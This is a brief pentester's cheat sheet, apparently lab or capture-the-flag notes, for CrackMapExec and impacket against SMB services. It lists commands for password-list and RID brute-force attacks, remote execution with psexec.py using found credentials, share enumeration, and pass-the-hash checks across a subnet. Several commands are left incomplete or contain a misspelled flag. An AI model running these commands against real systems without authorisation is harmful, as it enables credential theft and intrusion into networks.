# Crackmapexec ## Dictionary attack against SMB ```sh cme -u s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-sucess --no-brute ``` ## Brute Force attack against SMB Brute force attack using an anonymous user ```sh cme smb -u anonymous -p "" --rid-brute 10000 ``` ## Use Found Password Use the password with `impacket/examples/psexec.py` in the following way ```sh psexec.py domain.name/:@ ``` ## Enumerate Shares Check user permissions on shares ```sh crackmapexec smb 10.200.x.0/24 -u -p --shares ``` ## SMB Check user hash on the network via smb ```sh crackmapexec smb 10.200.x.0/24 -u -d -H ```